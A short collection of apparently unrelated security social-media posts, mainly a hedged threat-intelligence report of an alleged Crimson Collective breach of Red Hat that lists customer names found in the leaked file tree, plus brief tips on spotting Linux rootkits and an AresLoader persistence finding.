‼️🚨 Red Hat breached: Crimson Collective stole 28k private repositories, including credentials, CI/CD secrets, pipeline configs, VPN profiles, and infrastructure blueprints. Our analysis of obtained data: 👇
The file tree includes thousands of repositories referencing major banks, telecoms, airlines, and public-sector organizations, such as Citi, Verizon, Siemens, Bosch, JPMC, HSBC, Merrick Bank, Telstra, Telefonica, and even mentions the U.S. Senate...
What's in the file tree dump? Inventories, hosts, Ansible playbooks, OpenShift install blueprints, CI/CD runners, VPN profiles, Quay/registry configs, Vault integrations, backups, and exported GitHub/GitLab configs.
The threat actor attempted to contact RedHat, and the reply is concerning...
Multiple staff were added to the ticket, visible to the threat actor, indicating an OpSec failure.
The threat actor told us that Red Hat is ignoring them and no longer responding to communication attempts.
Some example files:
Some of the customers being mentioned in the file tree: | Company | X Handle | |---------|----------| | 3M | @3M | | Accenture | @Accenture | | Adeo | No official X handle found | | Adobe | @Adobe | | ADP | @ADP | | Alaska Airlines | @AlaskaAir | | Ally | @Ally | | Amadeus |
| AXA | @AXA | | Bank of America | @BankofAmerica | | BBVA | @bbva | | BNP Paribas | @BNPParibas | | BNSF Railway | @BNSFRailway | | Boeing | @Boeing | | Bosch | @BoschGlobal | | Capgemini | @Capgemini | | Cisco | @Cisco | | Citi | @Citi | | Cummins | @Cummins | | Deloitte |
| Ericsson | @ericsson | | Experian | @Experian | | Federal Aviation Administration (FAA) | @FAANews | | Federal Emergency Management Agency (FEMA) | @fema | | Finanz Informatik | @FI_FFM | | Finastra | @FinastraFS | | Garanti BBVA | @GarantiBBVA | | HSBC | @HSBC | | IBM | @IBM |
This appears to be a significant breach based on the information obtained. Without access to the full archive, we cannot determine the full scope of the alleged breach. We have contacted Red Hat for comment.
There is someone exposing IRGC (Islamic Revolutionary Guard Corps) stuff on GitHub. I'm not a IRGC geopolitical nerd, so I can't assess the value of the content. However, if you know what the fuck is going on, maybe you'll find it interesting: https://github.com/KittenBuste...
kids who use this tool back in the day are now Kernel level Cheat-Developers, reverse engineers & malware developers lol ....
A secret to finding stealth rootkits on Linux is asking the same question multiple ways to see if the answers match. These inconsistencies can reveal the malware. Here we have a rootkit that hid its port from lsof, but ss shows something with a missing owner process.
While investigating NTUSER.DAT and SYSTEM registry hives, I uncovered malware persistence via obfuscated PowerShell in Run keys and a fake svchost.exe scheduled as a hidden task. YARA signatures identified the payload as a variant of AresLoader.
